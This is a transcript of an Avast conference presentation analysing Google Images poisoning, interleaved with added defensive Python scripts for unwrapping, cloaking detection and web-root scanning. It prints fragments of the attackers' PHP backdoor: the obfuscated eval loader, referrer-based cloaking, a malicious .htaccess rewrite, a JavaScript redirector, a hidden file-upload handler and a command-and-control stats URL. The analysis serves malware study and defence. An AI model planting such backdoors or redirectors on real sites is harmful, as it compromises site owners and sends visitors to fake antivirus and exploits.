Google-image poisoning: How hackers use images to spread malware


Transcript of Google-image poisoning: How hackers use images to spread malware

Page 1: Google-image poisoning: How hackers use images to spread malware

Analysis of Google Images Poisoning

Lukáš Hasík, Jan Širmer

www.avast.com

Page 2: Google-image poisoning: How hackers use images to spread malware

AVAR 2011

Agenda

• What is Google-images poisoning?
• How it works
• Doorway generator
• JavaScript redirector
• Evolution
• Data from AVAST CommunityIQ userbase
• Summary
• Questions

Page 3: Google-image poisoning: How hackers use images to spread malware


Google Images poisoning

• SEO blackhat poisoning attack
• Uses hacked sites to redirect users to sites containing fake AV or exploits
• Uses keyword-rich pages with hot-linked images for higher indexing by search bots
• Images from hacked sites are near the top of the search results
• Focused on users coming from well-known search engines

Page 4: Google-image poisoning: How hackers use images to spread malware


Google Images poisoning

How it works?

[Diagram: User -> Infected server]

Page 5: Google-image poisoning: How hackers use images to spread malware


[Screenshot: Google search results]

Page 6: Google-image poisoning: How hackers use images to spread malware


Google Images poisoning

[Diagram: User -> Infected server -> Remote server (Fake AV)]

Page 7: Google-image poisoning: How hackers use images to spread malware


[Screenshot: Fake antiviruses]

Page 8: Google-image poisoning: How hackers use images to spread malware


Google Images poisoning

[Diagram: User -> Infected server -> Remote server (Fake AV) -> Bad guy]

Page 9: Google-image poisoning: How hackers use images to spread malware


Why is it so successful?


• Great SEO and nobody used SEO for “images”

Page 10: Google-image poisoning: How hackers use images to spread malware


Why is it so successful? (2)

[Diagram: Infected server -> Fake AV]

• Computer users do not expect that they can get infected when searching for images on legitimate sites

Page 11: Google-image poisoning: How hackers use images to spread malware


Why is it so successful? (3)

• Hide and Seek – if users are using the Opera browser or are coming from Google, Yahoo or Bing, they are served a JavaScript redirector

[Diagram: Malicious content]

Page 12: Google-image poisoning: How hackers use images to spread malware


Your website gets infected

• The bad guys are using stolen FTP credentials
• They upload a PHP script to the web server
• This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to the web server
• Bonus feature – it lets the owners know that the page is ready

Page 13: Google-image poisoning: How hackers use images to spread malware


Additional malicious files

• Xmlrpc.txt – remote server address stored
  -> Xml.txt -> Xml.cgi – address in Base64
• Iog.txt – redirecting JavaScript stored
• Shab100500.txt – spam HTML template stored
  -> Don.txt – HTML template in Base64

Page 14: Google-image poisoning: How hackers use images to spread malware


PHP script on infected sites

• Earlier, they used names such as \d{1,3}.php
• Today, they use names like microphone.php, etc.
• This script is responsible for:
  1. Creating spam pages for Google bot indexing
  2. Changing .htaccess
  3. Serving the redirect script to users, to exploit sites
  4. Serving the redirect script to users, to fake AV
  5. Downloading malicious files to the server
  6. Telling the owners that the site is ready

Page 15: Google-image poisoning: How hackers use images to spread malware


PHP script

Original PHP file uploaded to the server (the Base64 payload is truncated on the slide):

<? eval(gzuncompress(base64_decode('eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I='))); ?>

Page 16: Google-image poisoning: How hackers use images to spread malware


PHP script

PHP file after the first step of deobfuscation (fragments as shown on the slide):

• $GLOBALS['_1600532410_'] = Array(base64_decode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n …
• function _1070120820($i) { $a = Array('c'.'Q='.'=', 'cQ==', …
• ($GLOBALS['_1600532410_'][16]( _1070120820(6))) { …
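The two slides above show the wrapper (eval of a gzuncompress'd, Base64-decoded blob) and the naming style of the code inside it. The following Python script is an added example, not avast's tooling and not the malware: it peels such eval(gzuncompress(base64_decode('...'))) layers from a PHP file without executing anything and checks whether what comes out uses the $GLOBALS['_N_'] / _N() naming of the second stage. The inner sample is constructed (only the 'error_reporting' Base64 string is taken from the slide), and make_sample() builds the wrapped file with Python's zlib, which produces the same stream format as PHP's gzcompress().

```python
import base64
import re
import zlib

# One obfuscation layer as shown on the slides:
# eval(gzuncompress(base64_decode('...'))); the gzinflate (raw DEFLATE)
# and plain eval(base64_decode('...')) variants are accepted as well.
LAYER_RE = re.compile(
    r"eval\s*\(\s*(?:(?P<decomp>gzuncompress|gzinflate)\s*\(\s*)?"
    r"base64_decode\s*\(\s*'(?P<b64>[A-Za-z0-9+/=\s]+)'\s*\)\s*"
    r"(?(decomp)\)\s*)\)\s*;?",
    re.IGNORECASE,
)

# Naming style of the second stage on the slides: $GLOBALS['_<digits>_']
# arrays and functions called _<digits>()
STAGE2_RE = re.compile(r"\$GLOBALS\['_\d+_'\]|function\s+_\d+\s*\(")

# Constructed stand-in for the second-stage code (the slide shows only
# fragments); 'ZXJyb3JfcmVwb3J0aW5n' is Base64 for 'error_reporting'.
INNER_SAMPLE = (
    "$GLOBALS['_1600532410_']=Array(base64_decode('ZXJyb3JfcmVwb3J0aW5n'));\n"
    "function _1070120820($i){$a=Array('cQ==','cQ==');return base64_decode($a[$i]);}\n"
)


def unwrap_php_layers(src: str, max_layers: int = 10):
    """Peel nested eval(gzuncompress(base64_decode('...'))) wrappers.

    Returns (innermost_source, layers_removed). The decoded payload is
    never executed, only decoded and handed back for inspection.
    """
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.search(src)
        if not m:
            break
        raw = base64.b64decode(re.sub(r"\s+", "", m.group("b64")))
        decomp = (m.group("decomp") or "").lower()
        if decomp == "gzuncompress":
            raw = zlib.decompress(raw)                   # PHP gzcompress() = zlib stream
        elif decomp == "gzinflate":
            raw = zlib.decompress(raw, -zlib.MAX_WBITS)  # PHP gzdeflate() = raw DEFLATE
        src = raw.decode("utf-8", errors="replace")
        layers += 1
    return src, layers


def looks_like_stage_two(src: str) -> bool:
    """True if the code uses the $GLOBALS['_N_'] / _N() naming seen on the slides."""
    return bool(STAGE2_RE.search(src))


def make_sample(inner: str = INNER_SAMPLE, layers: int = 2) -> str:
    """Build a constructed PHP file wrapping `inner` in `layers` nested
    eval(gzuncompress(base64_decode())) layers, to exercise the unwrapper."""
    src = inner
    for _ in range(layers):
        blob = base64.b64encode(zlib.compress(src.encode("utf-8"))).decode("ascii")
        src = f"eval(gzuncompress(base64_decode('{blob}')));"
    return "<?" + src + " ?>"


if __name__ == "__main__":
    sample = make_sample()
    code, n = unwrap_php_layers(sample)
    print(f"removed {n} layer(s); stage-two naming: {looks_like_stage_two(code)}")
    print(code)
```

On a real file, run unwrap_php_layers() over the contents and treat a non-zero layer count, or a positive looks_like_stage_two(), as a reason to quarantine the file and review it by hand; the decoded stage is still obfuscated by the string tables the slide shows, so this only removes the outer packing.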

Page 17: Google-image poisoning: How hackers use images to spread malware


PHP script after removing obfuscation (fragments as shown on the slide):

if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) {
    …
}
if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
    …
    $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
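The "Hide and Seek" slide and the deobfuscated conditions above describe referrer and user-agent cloaking: the same URL returns the normal page to the site owner and a redirector to visitors arriving from a search engine or using Opera. The Python below is an added example (not avast's code and not the malware): a differential check that requests one URL under several client profiles and reports which profiles get a different body than a plain direct request, and whether that body carries the redirector markers from the JavaScript slide. constructed_doorway() is a stand-in that mirrors the PHP conditions so the check runs offline; the redirect target and the profile header values are assumptions.

```python
SEARCH_ENGINES = ("google.", "yahoo.", "bing.")

# Markers of the client-side redirector shown on the JavaScript slide
REDIRECT_MARKERS = ("top.location.href", "document.location")

COMMON_UA = "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"
OPERA_UA = "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.9.168 Version/11.50"

# Request profiles to compare; 'direct' is the baseline a site owner or a
# scanner without a Referer header normally sees (header values constructed)
PROFILES = {
    "direct": {"User-Agent": COMMON_UA},
    "from-google": {"User-Agent": COMMON_UA,
                    "Referer": "http://www.google.com/imgres?q=search-keywords"},
    "from-bing": {"User-Agent": COMMON_UA,
                  "Referer": "http://www.bing.com/images/search?q=search-keywords"},
    "opera-direct": {"User-Agent": OPERA_UA},
}


def constructed_doorway(headers):
    """Constructed stand-in for the infected server: applies the same
    conditions as the deobfuscated PHP (Opera user-agent or search-engine
    referrer) and returns a redirector page in that case, the ordinary page
    otherwise. Not real malware code; the target is a placeholder."""
    ua = headers.get("User-Agent", "")
    ref = headers.get("Referer", "")
    if "Opera" in ua or any(se in ref for se in SEARCH_ENGINES):
        return ("<script>var URL='http://FAKEAV_PLACEHOLDER/fast-scan/';"
                "if(window!=top){top.location.href=URL;}else document.location=URL;"
                "</script>")
    return "<html><body><h1>Photo gallery</h1></body></html>"


def has_redirector(body):
    """True if the body contains the redirector statements from the slide."""
    return any(marker in body for marker in REDIRECT_MARKERS)


def detect_cloaking(fetch, profiles=PROFILES):
    """Fetch the same URL under every profile and return the profiles whose
    response differs from the 'direct' baseline, mapped to whether that
    response carries a client-side redirector.

    `fetch(headers) -> body` is supplied by the caller; against a live site
    it would wrap urllib.request with the given headers."""
    baseline = fetch(profiles["direct"])
    differing = {}
    for name, headers in profiles.items():
        if name == "direct":
            continue
        body = fetch(headers)
        if body != baseline:
            differing[name] = has_redirector(body)
    return differing


if __name__ == "__main__":
    for profile, redirect in detect_cloaking(constructed_doorway).items():
        print(f"{profile}: differs from baseline, redirector={redirect}")
```

Because the cloaked content only appears with a search-engine Referer, a webmaster who opens the site directly, or a crawler that sends no Referer, sees nothing wrong; the differential request is the cheapest way to surface the difference. Pages with per-visitor content (ads, session tokens) will also differ between profiles, so a difference alone is a lead, and the redirector check is what turns it into a finding.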

Page 18: Google-image poisoning: How hackers use images to spread malware


Doorway generator

• The HTML template is stored in the file .log/SITE/shab100500.txt
• In the new version, shab100500.txt was replaced by don.txt

Template as shown on the slide:

<HTML>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
</HTML>

<Replaceme></Replaceme>

Page 19: Google-image poisoning: How hackers use images to spread malware


Doorway generator

• Get descriptions of the top 50 'search keywords' from Google web search
• Shuffle the words into their descriptions to get unique text

Example of the resulting text (from the slide):

harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived

Page 20: Google-image poisoning: How hackers use images to spread malware


Doorway generator

• Get the top 20 'search keyword' results from Google Images and extract links to the image files
• Generate <img> tags and shuffle them

<img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">

Page 21: Google-image poisoning: How hackers use images to spread malware


Doorway generator

Text and image tags are interleaved (from the slide):

harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived
<img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
harmful action against a person or group in response revenge to a grievance<img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">

Page 22: Google-image poisoning: How hackers use images to spread malware


Doorway generator

The generated content is inserted into the template at the <Replaceme></Replaceme> placeholder:

<HTML>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
</HTML>

<Replaceme></Replaceme>

Sections of the generated doorway page (slide annotations):
• <h1>SEARCH KEYWORD</h1>
• Suggested links
• Links to the 30 most recently generated pages
• Rich-word generated text with hot-linked images
• Links to alternative pages

Page 23: Google-image poisoning: How hackers use images to spread malware


How do they make image URLs less suspicious?

• The PHP script writes this rule into .htaccess (as a PHP string on the slide):

"RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ " . $_SERVER['SCRIPT_NAME'] . "?q=$1 [L]"

• This changes the URL from the suspicious http://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywords
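The rewrite rule above and the file list on the "Additional malicious files" slide are both artefacts a site owner can look for on disk. The following Python is an added example (not avast's tooling): it walks a web root and reports .htaccess files whose catch-all RewriteRule feeds every non-existent path into a PHP script's ?q= parameter, plus any of the dropped file names from the slides found under a .log/ directory. build_sample_webroot() creates a constructed directory tree for the example; the script name microphone.php is from the slides, the directory name example.org and the other paths are assumptions.

```python
import os
import re
import tempfile

# File names the slides list as dropped under .log/SITE/ on infected hosts
DROPPED_FILES = {"xmlrpc.txt", "xml.txt", "xml.cgi", "iog.txt",
                 "shab100500.txt", "don.txt"}

# Catch-all rewrite that routes every non-existent path into a PHP
# script's ?q= parameter, as written into .htaccess by the script
CATCHALL_RE = re.compile(
    r"RewriteRule\s+\^\(\.\*\)\$\s+\S+?\.php\?q=\$1", re.IGNORECASE)


def htaccess_is_catch_all(text: str) -> bool:
    """True if the .htaccess text contains the ^(.*)$ -> script.php?q=$1 rule."""
    return bool(CATCHALL_RE.search(text))


def scan_webroot(root: str):
    """Walk a web root and return sorted (kind, relative_path) findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        in_log_dir = ".log" in dirpath.split(os.sep)
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if in_log_dir and name.lower() in DROPPED_FILES:
                findings.append(("dropped-file", rel))
            elif name == ".htaccess":
                with open(full, encoding="utf-8", errors="replace") as fh:
                    if htaccess_is_catch_all(fh.read()):
                        findings.append(("catch-all-rewrite", rel))
    return sorted(findings)


def build_sample_webroot() -> str:
    """Create a constructed web root in a temp dir: a clean WordPress-style
    .htaccess at the top plus an infected wp-admin/ subtree modelled on the
    slides. Returns the root path."""
    root = tempfile.mkdtemp(prefix="webroot-")

    def put(rel, text):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)

    # Ordinary pretty-permalink rule: rewrites to index.php, no ?q= parameter
    put(".htaccess", "RewriteEngine On\nRewriteBase /\n"
        "RewriteCond %{REQUEST_FILENAME} !-f\n"
        "RewriteCond %{REQUEST_FILENAME} !-d\n"
        "RewriteRule . /index.php [L]\n")
    # Rule from the slide with SCRIPT_NAME filled in (microphone.php assumed)
    put("wp-admin/.htaccess", "RewriteEngine On\n"
        "RewriteCond %{REQUEST_FILENAME} !-f\n"
        "RewriteCond %{REQUEST_FILENAME} !-d\n"
        "RewriteRule ^(.*)$ /wp-admin/microphone.php?q=$1 [L]\n")
    put("wp-admin/.log/example.org/xmlrpc.txt", "REMOTE_SERVER_PLACEHOLDER\n")
    put("wp-admin/.log/example.org/iog.txt", "// redirect script placeholder\n")
    put("wp-admin/.log/example.org/notes.txt", "unrelated\n")
    put("images/photo.jpg", "")
    return root


if __name__ == "__main__":
    for kind, path in scan_webroot(build_sample_webroot()):
        print(f"{kind}: {path}")
```

Note that a legitimate CMS also ships a RewriteCond !-f / !-d pair, which is why the check keys on the destination (a .php script taking the whole path as ?q=) rather than on the conditions; any hit should be confirmed by reading the target script, for example with the unwrapper from the PHP-script slides.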

Page 24: Google-image poisoning: How hackers use images to spread malware


PHP script evolution

• The first version was focused on all users using the Opera browser or users coming from Google, Yahoo or Bing
• During June, we found some changes in the PHP code:
  - Google is the only target
  - New redirection system
• The request goes to a remote server (mydiarycom.net) – centralized
• They have statistical data from the parameters
• No need to update iog.txt (the redirecting script) or make differentiating changes on each server

Page 25: Google-image poisoning: How hackers use images to spread malware


Data parameters

http://mydiarycom.net/out/stat.cgi?parameter=

1. Name of the doorway site
2. The full URL of the doorway script
3. Visitor's IP
4. The referring URL
5. The User-Agent of the user's browser
6. The search query used on Google

Page 26: Google-image poisoning: How hackers use images to spread malware


IP address and user-agents

[Chart: IP addresses and user-agents – Fake AV]

Page 27: Google-image poisoning: How hackers use images to spread malware


IP address and user-agents

[Chart: IP addresses and user-agents – Spam page]

Page 28: Google-image poisoning: How hackers use images to spread malware


JavaScript redirector

var URL = "SITE contains FakeAV" + encodeURIComponent(document.referrer)
    + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + encodeURIComponent(document.URL)
    + "&default_keyword=default";
if (window != top) { top.location.href = URL; }
else document.location = URL;

Page 29: Google-image poisoning: How hackers use images to spread malware


Redirection

• Mac – http://IP/r/RANDOM_STRING (IP and 'r' change every 30 minutes)
• Exploit site – http://SITE/index.php?tp=RANDOM_STRING (site and 'tp' change every 30 minutes)
• Fake AV – http://SITE/fast-scan/

Page 30: Google-image poisoning: How hackers use images to spread malware


Other changes

• Rotating user-agent string
• Password-protected maintenance request – someone who knows how this algorithm works could easily change it and redirect to his or her own site
• Xml.txt was replaced by xml.cgi
• Working with free blog sites

Page 31: Google-image poisoning: How hackers use images to spread malware


Password-protected maintenance request (brackets and quotes restored where the slide lost them):

if ($_GET['dom100500'] != '') {
    $_13 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+');
    fwrite($_13, $_GET['dom100500']);
    fclose($_13);
}
if ($_GET['up100500'] != '') {
    $_14 = '';
    $_14 = $_14 . basename($_FILES['uploaded']['name']);
    $_15 = round(0 + 0.5 + 0.5);
    if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $_14)) …

Page 32: Google-image poisoning: How hackers use images to spread malware


Data from the AVAST CommunityIQ

• From March to August 2011, we discovered 22,580 unique infected sites
• 5,698 sites are still infected
• Typo: <IMG HEIGTH=?1?WIDTH

Page 33: Google-image poisoning: How hackers use images to spread malware


[Chart: Infected domains]

Page 34: Google-image poisoning: How hackers use images to spread malware


[Chart: Number of infected domains]

Page 35: Google-image poisoning: How hackers use images to spread malware


Summary

• Google-image poisoning is an easy way to spread fake AV and exploits
• It's based on stolen FTP credentials of webmasters and well-built backdoor algorithms
• The number of infected legitimate domains is growing every day
• Common sense is not sufficient protection

Page 36: Google-image poisoning: How hackers use images to spread malware


Questions and Answers


Page 37: Google-image poisoning: How hackers use images to spread malware


Thank you

Jan Sirmer ([email protected]), Senior Virus Analyst
Lukas Hasik ([email protected]), QA Director